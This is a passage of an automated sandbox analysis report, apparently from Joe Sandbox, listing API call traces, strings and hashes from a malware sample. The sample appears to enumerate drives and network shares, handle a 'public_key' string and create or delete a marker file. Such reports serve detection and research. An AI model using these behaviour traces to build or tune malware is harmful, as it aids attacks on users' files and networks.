                • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
                • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
                • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
                • lstrlenA.KERNEL32(?), ref: 0041EAC8
                • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
                • lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
                • lstrlenA.KERNEL32(?), ref: 0041EB7C
                • _malloc.LIBCMT ref: 0041EB86
                • _memset.LIBCMT ref: 0041EB94
                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
                • lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
                • _strstr.LIBCMT ref: 0041EBDA
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
                • DeleteFileA.KERNEL32(?), ref: 0041EC32
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                • String ID: bowsakkdestx.txt${"public_key":"
                • API String ID: 2805819797-1771568745
                • Opcode ID: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                • Instruction ID: c8d03ce4d59ef2fdab541fe9505dce31f646fa9b39186cada3cd653a8fd1c75a
                • Opcode Fuzzy Hash: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                • Instruction Fuzzy Hash: 3901D234448391ABD630DF119C45FDF7B98AF51304F44482EFD8892182EF78A248879B
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: __aulldvrm
                • String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
                • API String ID: 1302938615-3129329331
                • Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                • Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
                • Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                • Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96
                APIs
                • ___unDName.LIBCMT ref: 0043071B
                • _strlen.LIBCMT ref: 0043072E
                • __lock.LIBCMT ref: 0043074A
                • _malloc.LIBCMT ref: 0043075C
                • _malloc.LIBCMT ref: 0043076D
                • _free.LIBCMT ref: 004307B6
                  • Part of subcall function 004242FD: IsProcessorFeaturePresent.KERNEL32(00000017,004242D1,i;B,?,?,00420CE9,0042520D,?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C), ref: 004242FF
                • _free.LIBCMT ref: 004307AF
                  • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                  • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _free_malloc$ErrorFeatureFreeHeapLastNamePresentProcessor___un__lock_strlen
                • String ID:
                • API String ID: 3704956918-0
                • Opcode ID: 491e64a43db57974c805febdf09b12bb5f9e435b923affe35b2a08799ec4d9db
                • Instruction ID: 67f118bcdaa5faec8c00adc58c02bfbdeebce6865ed580ae06d436c8457e8144
                • Opcode Fuzzy Hash: 491e64a43db57974c805febdf09b12bb5f9e435b923affe35b2a08799ec4d9db
                • Instruction Fuzzy Hash: 3121DBB1A01715ABD7219B75D855B2FB7D4AF08314F90922FF4189B282DF7CE840CA98
                APIs
                • timeGetTime.WINMM ref: 00411B1E
                • timeGetTime.WINMM ref: 00411B29
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B4C
                • DispatchMessageW.USER32(?), ref: 00411B5C
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B6A
                • Sleep.KERNEL32(00000064), ref: 00411B72
                • timeGetTime.WINMM ref: 00411B78
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: MessageTimetime$Peek$DispatchSleep
                • String ID:
                • API String ID: 3697694649-0
                • Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                • Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
                • Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                • Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9
                APIs
                • __init_pointers.LIBCMT ref: 00425141
                  • Part of subcall function 00427D6C: EncodePointer.KERNEL32(00000000,?,00425146,00423FFE,00507990,00000014), ref: 00427D6F
                  • Part of subcall function 00427D6C: __initp_misc_winsig.LIBCMT ref: 00427D8A
                  • Part of subcall function 00427D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004326B3
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004326C7
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004326DA
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004326ED
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00432700
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00432713
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00432726
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00432739
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0043274C
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0043275F
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00432772
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00432785
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00432798
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004327AB
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004327BE
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004327D1
                • __mtinitlocks.LIBCMT ref: 00425146
                • __mtterm.LIBCMT ref: 0042514F
                  • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B62
                  • Part of subcall function 004251B7: _free.LIBCMT ref: 00428B69
                  • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(0050AC00,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B8B
                • __calloc_crt.LIBCMT ref: 00425174
                • __initptd.LIBCMT ref: 00425196
                • GetCurrentThreadId.KERNEL32 ref: 0042519D
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                • String ID:
                • API String ID: 3567560977-0
                • Opcode ID: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
                • Instruction ID: 366d1241f395ce705af539ece55ec53f654f371a685379b5f067519d47a60e56
                • Opcode Fuzzy Hash: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
                • Instruction Fuzzy Hash: 75F0CD32B4AB712DE2343AB67D03B6B2680AF00738BA1061FF064C42D1EF388401455C
                APIs
                • __lock.LIBCMT ref: 0042594A
                  • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                  • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                  • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                • _free.LIBCMT ref: 00425970
                  • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                  • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                • __lock.LIBCMT ref: 00425989
                • ___removelocaleref.LIBCMT ref: 00425998
                • ___freetlocinfo.LIBCMT ref: 004259B1
                • _free.LIBCMT ref: 004259C4
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                • String ID:
                • API String ID: 626533743-0
                • Opcode ID: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                • Instruction ID: 81c7b0a8007453265eca5a285afc690957d7e654b57493ebbede42104a270bc8
                • Opcode Fuzzy Hash: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                • Instruction Fuzzy Hash: E801A1B1702B20E6DB34AB69F446B1E76A0AF10739FE0424FE0645A1D5CFBD99C0CA5D
                APIs
                • ___from_strstr_to_strchr.LIBCMT ref: 004507C3
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: ___from_strstr_to_strchr
                • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                • API String ID: 601868998-2416195885
                • Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                • Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
                • Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                • Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: .\crypto\buffer\buffer.c$g9F
                • API String ID: 2102423945-3653307630
                • Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                • Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
                • Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                • Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9
                APIs
                • __getptd_noexit.LIBCMT ref: 004C5D3D
                  • Part of subcall function 0042501F: GetLastError.KERNEL32(?,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425021
                  • Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
                  • Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
                  • Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
                  • Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425083
                • __calloc_crt.LIBCMT ref: 004C5D60
                • __get_sys_err_msg.LIBCMT ref: 004C5D7E
                • __get_sys_err_msg.LIBCMT ref: 004C5DCD
                Strings
                • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                • API String ID: 3123740607-798102604
                • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                • Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
                • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                • Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _fprintf_memset
                • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                • API String ID: 3021507156-3399676524
                • Opcode ID: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                • Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
                • Opcode Fuzzy Hash: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                • Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA
                APIs
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Path$AppendFolder
                • String ID: bowsakkdestx.txt
                • API String ID: 29327785-2616962270
                • Opcode ID: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                • Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
                • Opcode Fuzzy Hash: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                • Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9
                APIs
                • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                • ShowWindow.USER32(00000000,00000000), ref: 0041BABE
                • UpdateWindow.USER32(00000000), ref: 0041BAC5
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Window$CreateShowUpdate
                • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                • API String ID: 2944774295-3503800400
                • Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                • Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
                • Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                • Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C
                APIs
                • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
                • GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
                • _memset.LIBCMT ref: 00410C4C
                • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Enum$AllocGlobalOpenResource_memset
                • String ID:
                • API String ID: 364255426-0
                • Opcode ID: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                • Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
                • Opcode Fuzzy Hash: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                • Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A
                APIs
                • __getenv_helper_nolock.LIBCMT ref: 00441726
                • _strlen.LIBCMT ref: 00441734
                  • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                • _strnlen.LIBCMT ref: 004417BF
                • __lock.LIBCMT ref: 004417D0
                • __getenv_helper_nolock.LIBCMT ref: 004417DB
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                • String ID:
                • API String ID: 2168648987-0
                • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                • Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
                • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                • Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD
                APIs
                • GetLogicalDrives.KERNEL32 ref: 00410A75
                • SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                • PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                • SetErrorMode.KERNEL32(00000000), ref: 00410B02
                • GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                • String ID:
                • API String ID: 2560635915-0
                • Opcode ID: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                • Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
                • Opcode Fuzzy Hash: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                • Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97
                APIs
                • _malloc.LIBCMT ref: 0043B70B
                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                  • Part of subcall function 00420C62: HeapAlloc.KERNEL32(005C0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                • _free.LIBCMT ref: 0043B71E
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: AllocHeap_free_malloc
                • String ID:
                • API String ID: 2734353464-0
                • Opcode ID: ac30be484878ed1c1fbcd2781803b0d6d497061a6a5de6108b0294a208768cdb
                • Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
                • Opcode Fuzzy Hash: ac30be484878ed1c1fbcd2781803b0d6d497061a6a5de6108b0294a208768cdb
                • Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC
                APIs
                • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041F085
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0AC
                • DispatchMessageW.USER32(?), ref: 0041F0B6
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0C4
                • WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                • String ID:
                • API String ID: 1380987712-0
                • Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                • Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
                • Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                • Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98
                APIs
                • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041E515
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E53C
                • DispatchMessageW.USER32(?), ref: 0041E546
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E554
                • WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                • String ID:
                • API String ID: 1380987712-0
                • Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                • Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
                • Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                • Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98
                APIs
                • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FA53
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA71
                • DispatchMessageW.USER32(?), ref: 0041FA7B
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA89
                • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                • String ID:
                • API String ID: 1380987712-0
                • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
